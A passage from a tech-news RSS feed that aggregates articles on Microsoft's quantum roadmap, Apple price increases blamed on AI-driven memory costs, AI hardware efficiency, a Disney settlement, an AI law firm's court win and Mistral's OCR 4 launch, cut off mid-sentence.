<p>“We stand by our results and our roadmap,” said technical fellow and vice president of quantum hardware, <a href="https://www.linkedin.com/in/cnayak-quantum/" target="_blank" rel="nofollow">Dr. Chetan Nayak</a>. “At the end of the day, success is the delivery of a scalable quantum computer. We are confident in our ability to execute against our roadmap.”</p>



<p>“Skepticism and rigor are hallmarks of the scientific process, which we appreciate and have supported from various academics,” he added. “We have participated in dialogue and our <a href="https://arxiv.org/abs/2504.13240" target="_blank" rel="nofollow">thorough rebuttal</a> was accepted and published by Nature.”</p>



<p>Microsoft is not the only company researching quantum computing hardware, with <a href="https://www.networkworld.com/article/4088709/top-quantum-breakthroughs-of-2025.html#:~:text=6.%20New%20hardware%20breakthroughs%20in%20size%20and%20qubit%20types" target="_blank">Google, IBM, and Amazon also working on designs</a>. But even if the hardware matures on the schedule claimed by Microsoft,  many believe the gap between technology and implementation inside enterprises could be more of <a href="https://www.infoworld.com/article/3836942/does-microsofts-majorana-chip-meet-enterprise-needs.html" target="_blank">a slow burn than a sudden jump forward</a>.</p>



<p><em>This article originally appeared on <a href="https://www.networkworld.com/article/4189610/researchers-cast-new-doubt-on-microsofts-quantum-computing-advance.html" target="_blank">NetworkWorld</a>.</em></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Apple raises hardware prices; AI gets the blame]]></title>
<description><![CDATA[Apple’s threatened product pricing hike arrived Thursday with steep increases landing across all its products (except the iPhone) — and rapidly accelerating RAM prices are to blame.



Apple CEO Tim Cook had warned last week about the need for price increases, with Bloomberg reporter Mark Gurman ...]]></description>
<link>https://tsecurity.de/de/3625432/it-nachrichten/apple-raises-hardware-prices-ai-gets-the-blame/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3625432/it-nachrichten/apple-raises-hardware-prices-ai-gets-the-blame/</guid>
<pubDate>Thu, 25 Jun 2026 19:18:07 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>Apple’s threatened product pricing hike arrived Thursday with steep increases landing across all its products (except the iPhone) — and <a href="https://www.computerworld.com/article/4186730/apple-scrambles-to-handle-component-price-hikes.html">rapidly accelerating RAM prices</a> are to blame.</p>



<p>Apple CEO Tim Cook had warned last week about the need for price increases, with Bloomberg reporter Mark Gurman subsequently telling us these were “imminent.”</p>



<p>The increases have been imposed as a result of the massive demand for memory and storage components generated by the rapid investment in AI servers. Prices have increased to meet this demand, with vendors shifting manufacturing to the advanced memory modules demanded by AI companies. In doing so, they have not invested in additional production capacity, further exacerbating the demand/supply imbalance.</p>



<p>“Unfortunately, price increases are unavoidable,” Cook told <em>The Wall Street Journal</em>. “We’re doing our best to mitigate the huge increases that are being passed to us, and we’ve been trying to shield our customers from the increases, but the situation has become unsustainable.”</p>



<h2 class="wp-block-heading"><strong>The price increases are going to hurt</strong></h2>



<p>The price hikes even affect products Apple hasn’t updated in years, such as the HomePod and Apple TV. The extent of the increase is big in some cases — the Apple TV is up 55% while an M3 Ultra Mac Studio sees a 32.5% rise. While I had hoped any higher prices would be aimed at Apple’s high-end products, the extent and scale of the changes suggests the enormity of the component price increases the company has been struggling with.  </p>



<p>“We haven’t seen anything like this in modern Apple,” <a href="https://x.com/neilcybart/status/2070137181260128640?s=20">said Neil Cybart</a> at Above Avalon.</p>



<p>Here’s what starting prices look like now:</p>



<h3 class="wp-block-heading">Macs</h3>



<ul class="wp-block-list">
<li>MacBook Pro, up $300 to $1,999.</li>



<li>MacBook Air, up $200 to $1,299.</li>



<li>MacBook Neo, up $100 to $699.</li>



<li>iMac, up $200 to $1,499.</li>



<li>Mac mini (M4 Pro), up $200 to $1,599. </li>



<li>Mac Studio (M4 Max), up $500 to $2,499.</li>



<li>Mac Studio (M3 Ultra), up $1,300, to $5,299.</li>
</ul>



<h3 class="wp-block-heading">iPads</h3>



<ul class="wp-block-list">
<li>iPad Air, up $200 to $749.</li>



<li>iPad Pro, up $200 to $1,199.</li>



<li>iPad, now starts at $449.</li>



<li>iPad mini, now $599.</li>
</ul>



<h3 class="wp-block-heading">Other hardware</h3>



<ul class="wp-block-list">
<li>Vision Pro, up $200 to $3,699</li>



<li>HomePod mini, up $30 to $129.</li>



<li>Apple TV, up $70 to $199.</li>
</ul>



<p>There were no immediate changes to the iPhone, Apple Watch and AirPods — but no guarantees, either, that their prices won’t also jump.</p>



<h2 class="wp-block-heading"><strong>This is AI-flation</strong></h2>



<p>The scale of these increases is like a dose of cold water on the already tepid optimism of investors. This was quickly reflected by a big sell off on Apple stock, which was down more than 6.5% at one point today. And the impact was contagious across the sector as investors realized that if Apple was forced to increase prices <a href="https://www.computerworld.com/article/4180406/after-a-quick-1-1m-sales-macbook-neo-set-to-reshape-the-pc-industry.html">even at the lower end of the market it so recently secured</a>, it’s likely other manufacturers will be forced to do the same. This can only further dampen market optimism.</p>



<p>Concerning the MacBook Neo, Francisco Jeronimo, IDC vice president for client devices, said: “The $100 increase takes the entry model from $599 to $699, close to a 17% increase, one of the sharpest percentage hikes in the announcement, and it hits one of Apple’s best-selling, most price-sensitive laptops right as it is winning share. Raising the price of its fastest-selling entry product indicates that Apple believes demand will stay strong, given the value the product offers. It also signals Apple is willing to give up some unit growth at the bottom of the range to defend margin, and it widens the gap the Neo had just closed against Windows entry-level machines.”</p>



<p>The fact of the matter is that consumers are effectively paying an inflationary fee for the benefit of the ongoing global AI rollout. That rollout is already consuming vast quantities of investor cash, despite the shaky business plan of existing incumbents. </p>



<p>“We have never seen a component price increase this much, this quickly,” Apple ​said in a statement. “We have shielded our customers from these increases so far, but we have now reached a point where we need to begin ⁠raising prices on a number of products, including today’s increases for iPad and Mac.”</p>



<p>Apple and the entire industry will not want to maintain prices at these levels if they can avoid it. That’s going to mean the entire tech industry will now begin leaning on memory manufacturers such as Micron to do more about building out production capacity, or at least promising to do so. Of course, the other hope might be that investors finally see the <a href="https://www.computerworld.com/article/4187825/the-trillion-dollar-ai-hallucination.html">folly of the AI business model and slow down deployment</a>, though that seems unlikely.</p>



<p>“We know this is not welcome news, and we are working tirelessly to find solutions,” the company said.</p>



<p><em>Please join me on social media at <a href="https://bsky.app/profile/jonnyevanssays.bsky.social" target="_blank" rel="noreferrer noopener">BlueSky</a>,  <a href="http://www.linkedin.com/in/jonnyevans" target="_blank" rel="noreferrer noopener">LinkedIn</a>, or <a href="https://social.vivaldi.net/@jonnyevans" target="_blank" rel="noreferrer noopener">Mastodon</a>, even better, please subscribe to <a href="https://thecorenews.substack.com/p/welcome-to-the-core?r=5l3lg" target="_blank" rel="noreferrer noopener">The Core</a> for your daily collection of human-curated Apple News.</em></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Apple Raises Prices for MacBooks, iPad, Apple TV, HomePod, and Vision Pro]]></title>
<description><![CDATA[Apple has increased prices for several major products, including MacBook Air, MacBook Pro, iPad, iPad Air, Apple TV 4K, HomePod, and Vision Pro, while iPhone, Apple Watch, and AirPods prices remain unchanged for now.



The new prices affect many entry-level and premium Apple devices, with some p...]]></description>
<link>https://tsecurity.de/de/3624829/ios-mac-os/apple-raises-prices-for-macbooks-ipad-apple-tv-homepod-and-vision-pro/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3624829/ios-mac-os/apple-raises-prices-for-macbooks-ipad-apple-tv-homepod-and-vision-pro/</guid>
<pubDate>Thu, 25 Jun 2026 16:10:48 +0200</pubDate>
<category>🍏 iOS / Mac OS</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Apple has increased prices for several major products, including MacBook Air, MacBook Pro, iPad, iPad Air, Apple TV 4K, HomePod, and Vision Pro, while iPhone, Apple Watch, and AirPods prices remain unchanged for now.



The new prices affect many entry-level and premium Apple devices, with some products seeing a $100 increase and others seeing much larger jumps. The MacBook Neo now starts at $699, up from $599, while the 13-inch MacBook Air now starts at $1,299, up from $1,099.



Apple says the price hikes come after a sharp rise in component costs, especially memory and storage parts used across consumer devices and AI server systems. According to the company, it had tried to absorb those higher costs for some time, but the pressure has now reached a point where it needs to raise prices on select products.



Why Apple Is Increasing Prices



Apple CEO Tim Cook said in a recent interview that the company had reached an “unsustainable” point because suppliers were passing on much higher component costs.



Cook said Apple had tried to reduce the impact on customers, but the scale of the price increases made that difficult. He also pointed to high-bandwidth memory demand for AI servers, which has tightened supply at a time when consumers still want new devices with more memory and storage.



Apple also said in a statement to Reuters that it has never seen component prices rise this much and this quickly, adding that the company will keep working on ways to reduce the impact.



New Apple Product Prices



ProductNew PriceOld PriceMacBook Neo$699$59913-inch MacBook Air$1,299$1,09915-inch MacBook Air$1,499$1,299M5 MacBook Pro$1,999$1,699M5 Pro MacBook Pro$2,499$2,199M5 Max MacBook Pro$4,099$3,599iMac$1,499$1,299M4 Max Mac Studio$2,499$1,999M3 Ultra Mac Studio$5,299$3,999iPad$449$34911-inch iPad Air$749$59913-inch iPad Air$949$74911-inch iPad Pro$1,199$99913-inch iPad Pro$1,499$1,299iPad mini$599$499Apple TV 4K$199$129HomePod$349$299HomePod mini$129$99Vision Pro$3,699$3,499



iPhone, Apple Watch, and AirPods Prices Stay the Same



Apple has not changed pricing for iPhone, Apple Watch, or AirPods, which means the latest price adjustment mainly affects Macs, iPads, home products, and Vision Pro.



That still makes this one of Apple’s wider price changes in recent memory, especially because it affects both affordable entry-level products and high-end professional machines.



The Mac Studio sees some of the biggest jumps, with the M3 Ultra model now starting at $5,299 instead of $3,999. The iPad lineup also gets more expensive across the board, with the base iPad now starting at $449 instead of $349.



For customers planning to buy a Mac or iPad soon, the new pricing makes upgrades more expensive, especially for models with higher memory and storage options.



Apple has made it clear that component costs forced this move, but the higher prices will still make many buyers think harder before upgrading. What do you think of Apple’s new prices? Let us know in the comments.]]></content:encoded>
</item>
<item>
<title><![CDATA[AI efficiency beyond the model: Rethinking code, hardware and cloud]]></title>
<description><![CDATA[As AI adoption grows, I see fellow enterprise leaders realizing that just implementing AI is not enough. We need to develop and adopt the best, fastest and most efficient AI models. It’s not just a matter of pride about who has the shiniest toy; optimizing models for efficiency can be the differe...]]></description>
<link>https://tsecurity.de/de/3624204/it-security-nachrichten/ai-efficiency-beyond-the-model-rethinking-code-hardware-and-cloud/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3624204/it-security-nachrichten/ai-efficiency-beyond-the-model-rethinking-code-hardware-and-cloud/</guid>
<pubDate>Thu, 25 Jun 2026 13:08:27 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>As AI adoption grows, I see fellow enterprise leaders realizing that just implementing AI is not enough. We need to develop and adopt the best, fastest and most efficient AI models. It’s not just a matter of pride about who has the shiniest toy; <a href="https://www.cio.com/article/4109911/cognitive-data-architecture-designing-self-optimizing-frameworks-for-scalable-ai-systems.html">optimizing models</a> for efficiency can be the difference between a failed pilot and an effective business strategy.</p>



<p>At the most extreme end of the spectrum, inefficient use of AI can cost billions of dollars. Sam Altman, CEO of OpenAI, made headlines when he <a href="https://x.com/sama/status/1912646035979239430" rel="nofollow">admitted on X</a> that his company loses tens of millions of dollars every time people say “please” and “thank you” to his AI models, even though he added that he feels it’s money well spent.</p>



<p>Model efficiency also matters for those of us not operating at OpenAI’s scale. A more efficient model helps reduce overall costs because it doesn’t require as powerful or expensive hardware, uses less electricity, delivers output faster and can operate with a smaller cloud footprint.</p>



<p>Models that are optimized for efficiency deliver lower latency, improved scalability, increased flexibility and are less likely to drift. In my experience, all of this adds up to higher profit margins, a sharper competitive edge and a faster time to market, which are crucial whether you’re planning to use your model internally or sell it to others.</p>



<h2 class="wp-block-heading">The new CIO investment dilemma</h2>



<p>For a long time, it was believed that hardware must continually increase in power to enable models to grow in size. Then DeepSeek v2 came along and demolished all those theories. It showed that more efficient hardware can deliver equivalent results with less compute power by running smaller, smarter models.</p>



<p>Now, those of us in the CIO seat face a new dilemma: should we increase investment in computing power, focus on hardware or concentrate on software?</p>



<p>In my view, the correct answer is: all the above. AI efficiency is a full-stack problem. Hardware, compilers, runtime and model architecture must be co-designed to work in harmony; otherwise, we’re wasting money and failing to achieve the results we need. Today, choosing GPUs vs. custom accelerators vs. CPUs affects which model optimizations are viable.</p>



<h2 class="wp-block-heading">Hardware power constraints model capabilities</h2>



<p>It remains true that even the most powerful model in the world can’t function without access to the necessary hardware. Hardware performance is ultimately bounded by memory bandwidth, interconnect speed and compute units, no matter how optimized our models are.</p>



<p>This means that scalability depends on interconnects. Multi-node training and large inference clusters hinge on the performance of NVLink, InfiniBand or Ethernet fabric, not just model quality, so decisions about hardware investments or cloud providers can be critical to overall functionality.</p>



<p>“The pace of innovation is directly tied to advances in GPUs, tensor processing units (TPUs) and custom accelerators. The real question isn’t just what models we can build, but whether we have the compute infrastructure to support them,” says Gaurav Dewan, a research director at Avasant. “Models can only grow as powerful as the chips, memory systems and data center networks sustaining them.”</p>



<h2 class="wp-block-heading"><a></a>Compute power isn’t everything</h2>



<p>That said, in my experience, you can’t just throw computing power at every problem. Choices about hardware and cloud architecture determine how effectively users can tap into the potential of compute resources. Modern AI workloads are often memory-bound rather than compute-bound, so faster HBM, cache hierarchies and interconnects directly lower latency.</p>



<p>What’s more, the energy for computing power is limited. Companies can’t always afford the compute power they want, <a href="https://www.cloudzero.com/state-of-ai-costs/" rel="nofollow">with 58% saying</a> their AI cloud costs are too high. Cost per inference is hardware-driven and compute is usually the biggest line item in AI TCO. It’s not even easy to find space for enough GPUs, creating board-level power and cooling constraints in enterprise AI. More efficient silicon reduces data center strain, sustainability risk and cost per token/inference.</p>



<p>Additionally, reliability and utilization affect ROI. Features like MIG partitioning, hardware scheduling and fault tolerance determine how fully we can monetize expensive accelerators. Performance per watt is now the bottom line, with CIOs like me striving to get more out of every existing GPU per watt, dollar and square meter. We need to make our hardware more efficient by fine-tuning models and software to maximize capability.</p>



<p>“DeepSeek’s breakthrough suggests that AI models no longer need to scale indefinitely in size and complexity to achieve superior performance. Instead, they can be algorithmically optimized to deliver the same, if not better, results while consuming significantly fewer resources,” explains Matthew Taylor <a href="https://www.linkedin.com/pulse/ai-infrastructure-dilemma-on-premises-vs-cloud-2025-dr-matthew--zed1e/" rel="nofollow">in his post</a> on LinkedIn.</p>



<h2 class="wp-block-heading">Rethinking cloud strategy in the age of AI</h2>



<p>That cost pressure has forced many of us to revisit assumptions we held for the better part of a decade. Cloud computing has reached an uncertain crossroads. The hyperscaler-by-default posture that defined the last era of enterprise IT no longer survives a serious look at AI economics.</p>



<p>When inference costs scale linearly with usage and training runs can consume an annual infrastructure budget in weeks, the question I hear in every CIO conversation is the same: does our cloud strategy still match the workload we are actually running?</p>



<p>In my experience, the answer is increasingly no, at least not without significant rebalancing. Private clouds, written off as legacy not long ago, are quietly making a comeback. The combination of predictable cost structures, tighter control over data residency and the sensitivity of the proprietary data feeding our AI systems is making on-premise and colocation options compelling again, particularly for regulated industries.</p>



<p>At the same time, purpose-built neoclouds for GPU workloads, along with sovereign clouds responding to jurisdictional and data-protection mandates, are steadily chipping away at the dominance of AWS, Azure and GCP. None of these alternatives replace the hyperscalers outright, but they are forcing every CIO I know to think about cloud as a portfolio rather than a single vendor relationship.</p>



<p>What I have found is that navigating this shift takes more than a procurement decision. It takes a clear-eyed view of where each workload genuinely belongs. Training, inference, retrieval, fine-tuning and experimentation each carry different cost curves, latency profiles and data-gravity considerations. As organizations move <a href="https://www.artefact.com/blog/data-platforms-for-the-agentic-era/" rel="nofollow">towards the agentic</a> AI era, the underlying data platform becomes equally important, requiring architectures that can support multimodal data, real-time processing and governance at scale.</p>



<p>The enterprises I have seen handle this best treat cloud strategy as an ongoing exercise in workload placement, not a one-time platform commitment.</p>



<p>That is also where the conversation tends to outgrow internal teams.</p>



<p>As AI moves from pilots to production, the questions get harder: how to architect data foundations that survive model churn, how to govern AI without strangling it, how to translate technical efficiency into measurable business value. I have seen organizations lean on specialist partners to think through these problems alongside them. Among the consultancies working at this intersection is Artefact, founded in Paris and operating across data strategy, AI engineering and enterprise transformation. Its work includes governance, platform development, operating models and workforce enablement—areas that have become increasingly important as organizations move from AI pilots to large-scale deployment.</p>



<p>What I find useful about these consultancies is not the technology recommendations themselves; it is the pattern recognition they bring from seeing similar cloud and AI transitions play out across geographies and sectors. In a moment when every CIO is rewriting the playbook simultaneously, that outside vantage point matters more than it used to.</p>



<h2 class="wp-block-heading">Hardware is often underused and misused</h2>



<p><a></a>A lot of hardware goes unused or underutilized. Often, GPUs sit idle due to deployment complexity and data infrastructure bottlenecks, so enterprises don’t see the value of the compute power they’re paying for. When data and computing are on two separate chips, compute is wasted moving data between the two locations.</p>



<p>Likewise, models that exceed accelerator memory or require excessive HBM traffic suffer steep latency and cost penalties. Optimizing models to align with hardware means that all the compute power is being put to good use.</p>



<p>Techniques like operator fusion, activation management, fine-tuning smaller models, pruning unnecessary parameters and memory-aware architectures keep more of the model resident on the accelerator, reduce unnecessary read/write cycles and combine steps so data is touched fewer times.</p>



<p>Kfir Aberman, founding member at Decart AI, <a href="https://www.techzine.eu/experts/analytics/136536/how-our-team-optimizes-infrastructure-for-minimal-ai-video-processing-latency/">explains this approach</a>. “Our solution to this was to optimize our kernels for how [Nvidia GPU] Hopper works. Essentially, we created a single ‘mega kernel’ that enables the chip to process all of a model’s computations in a single, continuous pass. By doing this, we eliminate all of the stopping, starting and data movement, allowing more of the GPU to be utilized more of the time, speeding up processing by an order of magnitude.”</p>



<p>When models match accelerator characteristics such as tensor core shapes, SIMD widths and kernel libraries, this keeps expensive silicon working effectively and translates theoretical FLOPs into real throughput.</p>



<h2 class="wp-block-heading">More hardware can’t overcome model mismatch</h2>



<p><a></a>Another way that organizations undermine ROI on their own AI investments is by ignoring coordination efficiency.</p>



<p>They’ll buy large GPU clusters but pay little attention to what seem like minor issues with batching and alignment. Unfortunately, when batch sizes are wrong, work is split inefficiently and network links become bottlenecks, you see expensive but underutilized clusters.</p>



<p>Ultimately, more GPUs don’t guarantee more performance. Parallelism and batching must match the system topology. Effective scaling depends on aligning data, tensor and pipeline parallelism and batch sizing with the actual interconnect bandwidth and node configuration.</p>



<h2 class="wp-block-heading">The magic happens when model and hardware come together</h2>



<p>The lesson that those of us in CIO roles are learning is that symbiosis between model and hardware is critical. Code determines what our AI can do, hardware determines how efficiently we can afford to do it and co-design determines whether our AI program scales economically and successfully.</p>



<p><strong>This article is published as part of the Foundry Expert Contributor Network.</strong><br><strong><a href="https://www.cio.com/expert-contributor-network/">Want to join?</a></strong></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Disney agrees to pay $50 million to YouTube TV and DirecTV subscribers]]></title>
<description><![CDATA[YouTube TV and DirecTV Stream customers may be eligible for a cash payout, after Disney agreed to pay $50 million to settle claims that it forced the services to increase their subscription prices. Anyone who was subscribed to YouTube TV or DirecTV Stream between April 1st, 2019, and March 31st, ...]]></description>
<link>https://tsecurity.de/de/3624182/it-nachrichten/disney-agrees-to-pay-50-million-to-youtube-tv-and-directv-subscribers/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3624182/it-nachrichten/disney-agrees-to-pay-50-million-to-youtube-tv-and-directv-subscribers/</guid>
<pubDate>Thu, 25 Jun 2026 13:02:18 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[YouTube TV and DirecTV Stream customers may be eligible for a cash payout, after Disney agreed to pay $50 million to settle claims that it forced the services to increase their subscription prices. Anyone who was subscribed to YouTube TV or DirecTV Stream between April 1st, 2019, and March 31st, 2026 is eligible to claim […]]]></content:encoded>
</item>
<item>
<title><![CDATA[Garfield AI Secures Landmark Court Victory for AI-Powered Law Firm]]></title>
<description><![CDATA[A significant milestone has been reached in the legal sector after an AI-powered law firm successfully helped win a court case in England, a result believed to be the first of its kind. Garfield AI, the UK's first regulated AI-powered law firm, managed the entire pre-trial process without lawyer ...]]></description>
<link>https://tsecurity.de/de/3623998/it-security-nachrichten/garfield-ai-secures-landmark-court-victory-for-ai-powered-law-firm/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3623998/it-security-nachrichten/garfield-ai-secures-landmark-court-victory-for-ai-powered-law-firm/</guid>
<pubDate>Thu, 25 Jun 2026 11:52:30 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><img width="1126" height="614" src="https://thecyberexpress.com/wp-content/uploads/AI-powered-law-firm.webp" class="attachment-post-thumbnail size-post-thumbnail wp-post-image" alt="AI-powered law firm" decoding="async" srcset="https://thecyberexpress.com/wp-content/uploads/AI-powered-law-firm.webp 1126w, https://thecyberexpress.com/wp-content/uploads/AI-powered-law-firm-300x164.webp 300w, https://thecyberexpress.com/wp-content/uploads/AI-powered-law-firm-1024x558.webp 1024w, https://thecyberexpress.com/wp-content/uploads/AI-powered-law-firm-768x419.webp 768w, https://thecyberexpress.com/wp-content/uploads/AI-powered-law-firm-600x327.webp 600w, https://thecyberexpress.com/wp-content/uploads/AI-powered-law-firm-150x82.webp 150w, https://thecyberexpress.com/wp-content/uploads/AI-powered-law-firm-750x409.webp 750w, https://thecyberexpress.com/wp-content/uploads/AI-powered-law-firm.webp 1126w, https://thecyberexpress.com/wp-content/uploads/AI-powered-law-firm-300x164.webp 300w, https://thecyberexpress.com/wp-content/uploads/AI-powered-law-firm-1024x558.webp 1024w, https://thecyberexpress.com/wp-content/uploads/AI-powered-law-firm-768x419.webp 768w, https://thecyberexpress.com/wp-content/uploads/AI-powered-law-firm-600x327.webp 600w, https://thecyberexpress.com/wp-content/uploads/AI-powered-law-firm-150x82.webp 150w, https://thecyberexpress.com/wp-content/uploads/AI-powered-law-firm-750x409.webp 750w" sizes="(max-width: 1126px) 100vw, 1126px" title="Garfield AI Secures Landmark Court Victory for AI-Powered Law Firm 1"></p><span data-contrast="auto">A significant milestone has been reached in the legal sector after an AI-powered law firm successfully helped win a court case in England, a result believed to be the first of its kind. Garfield AI, the UK's first regulated AI-powered law firm, managed the entire pre-trial process without lawyer supervision and delivered legal services for less than £400 (around $750).</span><span data-ccp-props='{"134233117":false,"134233118":false,"335559738":240,"335559739":240}'> </span>

<span data-contrast="auto">The case involved freelance HR consultant Tamires Camal Taquidir, who sought to recover an unpaid invoice worth nearly £7,000 ($13,200). Garfield AI used its legal assistant technology to prepare and send a formal demand letter before initiating legal proceedings against the debtor.</span><span data-ccp-props='{"134233117":false,"134233118":false,"335559738":240,"335559739":240}'> </span>

<span data-contrast="auto">From the beginning of the dispute until the matter was ready for trial, Garfield AI took responsibility for drafting court documents, preparing witness statements, and compiling trial bundles required for the hearing.</span><span data-ccp-props='{"134233117":false,"134233118":false,"335559738":240,"335559739":240}'> </span>
<h3 aria-level="2"><b><span data-contrast="none">Trial at Wandsworth County Court Ends in Claimant's Favour</span></b><span data-ccp-props='{"134233117":false,"134233118":false,"134245418":true,"134245529":true,"335559738":299,"335559739":299}'> </span></h3>
<span data-contrast="auto">Although Garfield AI handled all pre-trial legal work, a human advocate represented the claimant at trial. Shortly before proceedings began, the AI-powered law firm instructed junior barrister Dominic Li of One Essex Court to appear on behalf of Taquidir.</span><span data-ccp-props='{"134233117":false,"134233118":false,"335559738":240,"335559739":240}'> </span>

<span data-contrast="auto">Li commended the preparation completed by Garfield AI, stating that the platform presented the client's case "clearly and efficiently." However, he stressed that "advocacy at trial remained essential and a fundamentally human exercise."</span><span data-ccp-props='{"134233117":false,"134233118":false,"335559738":240,"335559739":240}'> </span>

<span data-contrast="auto">Following a three-hour hearing at Wandsworth County Court on 14 May, the court ruled in favour of Taquidir and ordered repayment of the outstanding debt. The judgment is widely regarded as a landmark victory for an AI-powered law firm and a notable example of <a href="https://thecyberexpress.com/cisa-first-chief-artificial-intelligence-officer/" target="_blank" rel="noopener">artificial intelligence</a> being used successfully within regulated legal services.</span><span data-ccp-props='{"134233117":false,"134233118":false,"335559738":240,"335559739":240}'> </span>
<h3 aria-level="2"><b><span data-contrast="none">Founders Highlight the Potential of an AI-powered Law Firm</span></b><span data-ccp-props='{"134233117":false,"134233118":false,"134245418":true,"134245529":true,"335559738":299,"335559739":299}'> </span></h3>
<span data-contrast="auto">Garfield AI co-founder Philip Young described the outcome as a major development for access to justice, particularly for individuals and small businesses that often abandon valid claims because of legal costs and procedural complexity.</span><span data-ccp-props='{"134233117":false,"134233118":false,"335559738":240,"335559739":240}'> </span>

<span data-contrast="auto">"This is a landmark moment, not just for Garfield AI, but for access to justice. For too long, businesses have been forced to write off debts because the cost, time, and stress of litigation made pursuing them uneconomic," Young said.</span><span data-ccp-props='{"134233117":false,"134233118":false,"335559738":240,"335559739":240}'> </span>

<span data-contrast="auto">Referring to the successful claim, he added: "Here, a freelancer who had done the work and not been paid was able to take her case all the way to trial, resist a counterclaim, and win. That is exactly why Garfield exists."</span><span data-ccp-props='{"134233117":false,"134233118":false,"335559738":240,"335559739":240}'> </span>

<span data-contrast="auto">Young also emphasized that the technology complemented rather than replaced legal professionals. "AI did not replace the judge, the barrister, or the <a href="https://thecyberexpress.com/moj-confirms-legal-aid-data-breach/" target="_blank" rel="noopener">legal system</a>. What it did was make the process more accessible, more efficient, and more affordable, so that a meritorious claimant could get to the point where her case could be heard and justice could be done."</span><span data-ccp-props='{"134233117":false,"134233118":false,"335559738":240,"335559739":240}'> </span>
<h3 aria-level="2"><b><span data-contrast="none">Growing Role for Regulated Legal AI</span></b><span data-ccp-props='{"134233117":false,"134233118":false,"134245418":true,"134245529":true,"335559738":299,"335559739":299}'> </span></h3>
<span data-contrast="auto">Authorized and regulated by the UK's Solicitors Regulation Authority (SRA) last year, Garfield AI focuses on helping individuals and small businesses pursue disputes valued between £30 and £10,000 (approximately $50 to $19,000), as reported by </span><a href="https://www.cyberdaily.au/digital-transformation/13804-ai-law-firm-wins-court-case-in-legal-profession-first" target="_blank" rel="nofollow noopener"><span data-contrast="none">Cyber Daily</span></a><span data-contrast="auto">.</span><span data-ccp-props='{"134233117":false,"134233118":false,"335559738":240,"335559739":240}'> </span>

<span data-contrast="auto">Daniel Long, CTO and co-founder of Garfield AI, said the case demonstrated the practical benefits of regulated legal AI. "This case shows what legal AI can do in the real world. It is not about gimmicks or replacing lawyers. It is about giving people and businesses the tools to enforce their rights when the traditional route would be too slow, too costly, or too complex," he said.</span><span data-ccp-props='{"134233117":false,"134233118":false,"335559738":240,"335559739":240}'> </span>

<span data-contrast="auto">Long added: "We are still at the beginning of this journey, but the momentum is already clear. This trial win is an important proof point: regulated AI-powered legal services can help real people recover real money through the courts."</span><span data-ccp-props='{"134233117":false,"134233118":false,"335559738":240,"335559739":240}'> </span>]]></content:encoded>
</item>
<item>
<title><![CDATA[Mistral launches OCR 4, turning document extraction into a full enterprise AI play]]></title>
<description><![CDATA[Mistral AI on Tuesday released OCR 4, a document intelligence model that moves beyond raw text extraction to return structured representations of entire documents — complete with bounding boxes, block-type classification, and per-word confidence scores. The release marks Mistral's fourth generati...]]></description>
<link>https://tsecurity.de/de/3622912/it-nachrichten/mistral-launches-ocr-4-turning-document-extraction-into-a-full-enterprise-ai-play/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3622912/it-nachrichten/mistral-launches-ocr-4-turning-document-extraction-into-a-full-enterprise-ai-play/</guid>
<pubDate>Wed, 24 Jun 2026 23:48:27 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><a href="https://mistral.ai/">Mistral AI</a> on Tuesday released <a href="https://mistral.ai/news/ocr-4/">OCR 4</a>, a document intelligence model that moves beyond raw text extraction to return structured representations of entire documents — complete with bounding boxes, block-type classification, and per-word confidence scores. The release marks Mistral's fourth generation of optical character recognition technology in roughly 15 months and lands at a moment when the company's pitch for European AI sovereignty has never been more commercially relevant.</p><p>The model supports 170 languages across 10 language groups, accepts PDF, DOC, PPT, and OpenDocument formats, and can be deployed as a single container on an organization's own infrastructure — a capability Mistral is positioning directly at enterprises in regulated industries that cannot route sensitive documents through U.S.-jurisdiction cloud APIs.</p><p>"Mistral OCR 4 extracts and structures content from a wide range of documents," the company said in its announcement. "Where previous generations focused on converting a page into clean text and tables, OCR 4 returns a structured representation of the document."</p><p>The model is <a href="https://docs.mistral.ai/resources/cookbooks?useCase=OCR">available immediately</a> through the <a href="https://mistral.ai/pricing/">Mistral API</a>, Document AI in <a href="https://mistral.ai/products/studio/">Mistral Studio</a>, <a href="https://aws.amazon.com/sagemaker/ai/">Amazon SageMaker</a>, and <a href="https://azure.microsoft.com/en-us/products/ai-foundry">Microsoft Foundry</a>, with <a href="https://www.snowflake.com/en/blog/engineering/enterprise-scale-document-ai/">Snowflake Parse Document</a> support coming soon. Pricing starts at $4 per 1,000 pages, dropping to $2 per 1,000 pages through a batch API discount.</p><div></div><h2><b>OCR 4 treats every document as a semantic map, not a wall of text</b></h2><p>The central engineering shift in <a href="https://mistral.ai/news/ocr-4/">OCR 4</a> is structural. Rather than outputting a flat stream of extracted text — the paradigm that has defined OCR for decades — the model returns a layered representation in which every block is localized with a bounding box, classified by type (title, table, equation, signature, and others), and scored for confidence at both the page and word level.</p><p>Mistral says bounding boxes were its most-requested capability. The reason is straightforward: without location data, downstream systems cannot trace an extracted fact back to its source on a 